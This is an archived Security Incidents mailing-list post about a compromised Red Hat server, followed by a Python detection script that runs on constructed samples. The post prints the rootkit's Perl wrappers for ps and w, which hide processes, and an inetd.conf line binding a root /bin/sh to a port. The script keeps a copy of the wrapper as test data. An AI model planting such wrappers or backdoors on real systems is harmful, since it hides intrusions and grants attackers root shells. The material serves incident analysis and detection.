Security Incidents mailing list archives

nouser - rootkit ?

From: "Dan Uscatu" <duscatu () phenomedia ro>
Date: Mon, 11 Feb 2002 01:44:31 +0200

 I found today something funny happening when I tried to install a web
 on a customer's machine:
 1. w - returned some weird "/usr/bin/perl" processes
 2. ps - was not showing everything
 3. two connections to some irc servers; fuser - finding the process IDs for
 them, but ps not showing them

 some info about the server (unfortunately it wasn't installed by me...):
 [root@www root]# uname -a
 Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
 the future too, lol)
 [root@www /root]# cat /etc/redhat-release
 Red Hat Linux release 7.1 (Seawolf)

 more digging... so I found some modified files:

 [root@www nouser]# ls -l /bin/ps
 -rwxr-xr-x    1 nouser   nouser        188 Mar  2 15:45 /bin/ps

 [root@www /root]# cat /bin/ps
 $xargs =join(' ',@ARGV);
 $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
 grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
 print "$ps";
 [root@www /root]# ls -l /usr/lib/libxnotps
 -r-xr-xr-x    1 root     root        64092 Apr  5  2001 /usr/lib/libxnotps

 [root@www nouser]# ls -l /usr/bin/w
 -rwxr-xr-x    1 nouser   nouser        105 Jan 20 01:03 /usr/bin/w

 [root@www /root]# cat /usr/bin/w
 $xargs =join(' ',@ARGV);
 $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
 print "$w";
 [root@www /root]# ls -l /usr/lib/libxyotps
 -r-xr-xr-x    1 root     root         8688 Apr  5  2001 /usr/lib/libxyotps

 there is another file called /usr/lib/libxzotps, but I couldn't find what is
 pointing at that, yet.
 no reference found on the web, searching for "libxnotps" or "libxnotps" or

 [root@www nouser]# grep nouser /etc/passwd

 [root@www nouser]# ls -l /sbin/nouser
 total 3328
-rw-r--r--    1 nouser   nouser      80092 Mar  2 23:22 broadcast-5000.log
-rw-r--r--    1 nouser   nouser    3057793 Mar  2 23:22 broadcast-full.log
drwxr-xr-x    2 nouser   nouser       4096 Mar  2 13:01 Desktop
drwxrwxr-x    4 nouser   nouser       4096 Mar  5 19:23 iroffer
-rw-rw-r--    1 nouser   nouser     206865 Mar  5 19:23 iroffer.tar.gz
-rwsr-xr-x    1 root     root        13855 Mar  2 13:04 nouser
-rw-rw-r--    1 root     root         2215 Mar  2 23:23
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:15 scan-1
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-2
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-3
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:13 war

 of course the setuid "nouser" gives a root shell... and the directories are
full of war scripts, flood tools, and warez... given away through irc bots

I have scanned the machine using chkrootkit... the only funny thing found
was an inetd.conf, containing:

 [root@www nouser]# cat /etc/inetd.conf
65456    stream  tcp     nowait  root  /bin/sh     sh

 Of course, inetd is not installed :) That points me to the idea that the
process was somehow automated... but I can't find any reference to a rootkit
that does these changes. Seems pretty stupid for a rootkit anyway... but I
want to be sure no other major changes were made... before I install the
production server there.

thanks for any comments
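
The three symptoms in the post (ps hiding lines, system binaries replaced by short Perl wrappers owned by a non-root user, and a bare shell bound to a port in inetd.conf) can each be checked mechanically. The script below is an added example and is not part of the original post or of any rootkit it describes. It runs offline on constructed sample data: the /proc listing, the ps output, the wrapper text and the inetd.conf lines are all made up for the example, and the owner uid 1002 is an assumption (the post only shows the user name "nouser"). It assumes ps is invoked as `ps -eo pid=,comm=` so the PID is the first column.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): three checks for the userland
tampering described above.

  1. PIDs present in /proc but missing from `ps` output. A wrapper that pipes
     the real ps through `grep -v` removes lines; it cannot remove /proc entries.
  2. Files in system bin directories that are not ELF executables, are not
     owned by root, or run another program and filter its output with grep -v.
  3. inetd.conf entries whose server program is a shell, or whose "service"
     is a bare port number.
"""
import os
import re
import subprocess

ELF_MAGIC = b"\x7fELF"
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/tcsh", "/bin/ksh", "/bin/zsh"}

# Constructed sample data (not captured from the poster's machine).
SAMPLE_PROC = ["1", "2", "self", "4242", "4243", "net", "cpuinfo"]
SAMPLE_PS = "    1 init\n    2 kthreadd\n"          # wrapper already dropped 4242/4243
TROJAN_PS = (b"$xargs =join(' ',@ARGV);\n"
             b"$ps = `/usr/lib/libxnotps $xargs \\| grep -v nouser`;\n"
             b'print "$ps";\n')
SAMPLE_INETD = ("ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd\n"
                "65456    stream  tcp     nowait  root  /bin/sh     sh\n")


def pids_from_proc(entries):
    """Numeric directory names in a /proc listing are PIDs."""
    return {int(e) for e in entries if e.isdigit()}


def pids_from_ps(ps_output):
    """First token of each `ps -eo pid=,comm=` line is the PID; skip junk lines."""
    pids = set()
    for line in ps_output.splitlines():
        tok = line.split()
        if tok and tok[0].isdigit():
            pids.add(int(tok[0]))
    return pids


def hidden_pids(proc_entries, ps_output):
    """PIDs the kernel exposes in /proc that ps did not print, sorted."""
    return sorted(pids_from_proc(proc_entries) - pids_from_ps(ps_output))


def hidden_pids_live():
    """Same comparison on the running host; /proc is the reference, ps is the suspect."""
    ps = subprocess.run(["ps", "-eo", "pid=,comm="], capture_output=True, text=True, check=True)
    return hidden_pids(os.listdir("/proc"), ps.stdout)


def binary_findings(head, uid, size, text=None):
    """Findings for one file under /bin, /sbin, /usr/bin or /usr/sbin.

    head: first bytes of the file, uid: owner uid, size: length in bytes,
    text: decoded content for non-ELF files (used to spot grep -v wrappers).
    """
    findings = []
    if uid != 0:
        findings.append("not owned by root (uid %d)" % uid)
    if not head.startswith(ELF_MAGIC):
        findings.append("not an ELF executable (%d bytes)" % size)
        body = text if text is not None else head.decode("latin-1")
        # Backtick-executed command whose output is filtered with grep -v.
        if re.search(r"`[^`]*grep\s+-v[^`]*`", body):
            findings.append("runs another program and filters its output with grep -v")
    return findings


def inspect_binary(path):
    """Apply binary_findings() to a real file on disk."""
    st = os.stat(path)
    with open(path, "rb") as f:
        data = f.read()
    text = None if data.startswith(ELF_MAGIC) else data.decode("latin-1")
    return binary_findings(data[:4], st.st_uid, st.st_size, text)


def suspicious_inetd_entries(conf_text):
    """inetd.conf lines (service type proto wait user server args) handing out a shell."""
    hits = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 6:
            continue
        service, server = f[0], f[5]
        if server in SHELLS or service.isdigit():
            hits.append(line)
    return hits


if __name__ == "__main__":
    print("hidden PIDs:", hidden_pids(SAMPLE_PROC, SAMPLE_PS))
    print("wrapper findings:", binary_findings(TROJAN_PS[:4], 1002, len(TROJAN_PS), TROJAN_PS.decode()))
    print("inetd backdoor lines:", suspicious_inetd_entries(SAMPLE_INETD))
```

On a live box, `hidden_pids_live()` and `inspect_binary("/bin/ps")` do the real work; the sample run only shows what each check returns on the constructed data. The /proc comparison only catches userland wrappers like the one in the post: a kernel module rootkit that hides entries from /proc as well defeats it, so the reliable answer for a box in this state is still to reinstall from known-good media rather than to clean it.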

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:
